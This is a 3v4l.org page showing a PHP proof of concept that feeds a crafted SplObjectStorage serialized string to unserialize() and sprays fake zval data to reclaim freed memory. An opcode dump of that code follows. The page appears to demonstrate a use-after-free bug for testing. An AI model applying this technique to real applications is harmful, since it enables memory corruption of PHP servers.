3v4l.org

run code in 300+ PHP versions simultaneously
<?php $fakezval = ptr2str(1234567); $fakezval .= ptr2str(0); $fakezval .= "\x00\x00\x00\x00"; $fakezval .= "\x01"; $fakezval .= "\x00"; $fakezval .= "\x00\x00"; $inner = 'x:i:0;m:a:0:{}'; $exploit = 'a:2:{i:0;C:16:"SplObjectStorage":'.strlen($inner).':{'.$inner.'}i:1;R:3;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = $fakezval.$i; } var_dump($data); function ptr2str($ptr) { $out = ""; for ($i = 0; $i < 8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; }
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 29
Branch analysis from position: 29
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 25
Branch analysis from position: 31
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 25
2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 25
Branch analysis from position: 31
Branch analysis from position: 25
filename:       /in/JBfAU
function name:  (null)
number of ops:  35
compiled vars:  !0 = $fakezval, !1 = $inner, !2 = $exploit, !3 = $data, !4 = $i, !5 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    3     0  E >   INIT_FCALL_BY_NAME                                       'ptr2str'
          1        SEND_VAL_EX                                              1234567
          2        DO_FCALL                                      0  $6      
          3        ASSIGN                                                   !0, $6
    4     4        INIT_FCALL_BY_NAME                                       'ptr2str'
          5        SEND_VAL_EX                                              0
          6        DO_FCALL                                      0  $8      
          7        ASSIGN_OP                                     8          !0, $8
    5     8        ASSIGN_OP                                     8          !0, '%00%00%00%00'
    6     9        ASSIGN_OP                                     8          !0, '%01'
    7    10        ASSIGN_OP                                     8          !0, '%00'
    8    11        ASSIGN_OP                                     8          !0, '%00%00'
   10    12        ASSIGN                                                   !1, 'x%3Ai%3A0%3Bm%3Aa%3A0%3A%7B%7D'
   11    13        STRLEN                                           ~15     !1
         14        CONCAT                                           ~16     'a%3A2%3A%7Bi%3A0%3BC%3A16%3A%22SplObjectStorage%22%3A', ~15
         15        CONCAT                                           ~17     ~16, '%3A%7B'
         16        CONCAT                                           ~18     ~17, !1
         17        CONCAT                                           ~19     ~18, '%7Di%3A1%3BR%3A3%3B%7D'
         18        ASSIGN                                                   !2, ~19
   13    19        INIT_FCALL                                               'unserialize'
         20        SEND_VAR                                                 !2
         21        DO_ICALL                                         $21     
         22        ASSIGN                                                   !3, $21
   15    23        ASSIGN                                                   !4, 0
         24      > JMP                                                      ->29
   16    25    >   CONCAT                                           ~25     !0, !4
         26        ASSIGN_DIM                                               !5, !4
         27        OP_DATA                                                  ~25
   15    28        PRE_INC                                                  !4
         29    >   IS_SMALLER                                               !4, 5
         30      > JMPNZ                                                    ~27, ->25
   19    31    >   INIT_FCALL                                               'var_dump'
         32        SEND_VAR                                                 !3
         33        DO_ICALL                                                 
   29    34      > RETURN                                                   1

Function ptr2str:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 11
Branch analysis from position: 11
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 4
2 jumps found. (Code = 44) Position 1 = 13, Position 2 = 4
Branch analysis from position: 13
Branch analysis from position: 4
filename:       /in/JBfAU
function name:  ptr2str
number of ops:  15
compiled vars:  !0 = $ptr, !1 = $out, !2 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   21     0  E >   RECV                                             !0      
   23     1        ASSIGN                                                   !1, ''
   24     2        ASSIGN                                                   !2, 0
          3      > JMP                                                      ->11
   25     4    >   INIT_FCALL                                               'chr'
          5        BW_AND                                           ~5      !0, 255
          6        SEND_VAL                                                 ~5
          7        DO_ICALL                                         $6      
          8        ASSIGN_OP                                     8          !1, $6
   26     9        ASSIGN_OP                                     7          !0, 8
   24    10        PRE_INC                                                  !2
         11    >   IS_SMALLER                                               !2, 8
         12      > JMPNZ                                                    ~10, ->4
   28    13    > > RETURN                                                   !1
   29    14*     > RETURN                                                   null

End of function ptr2str

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
182.48 ms | 1400 KiB | 19 Q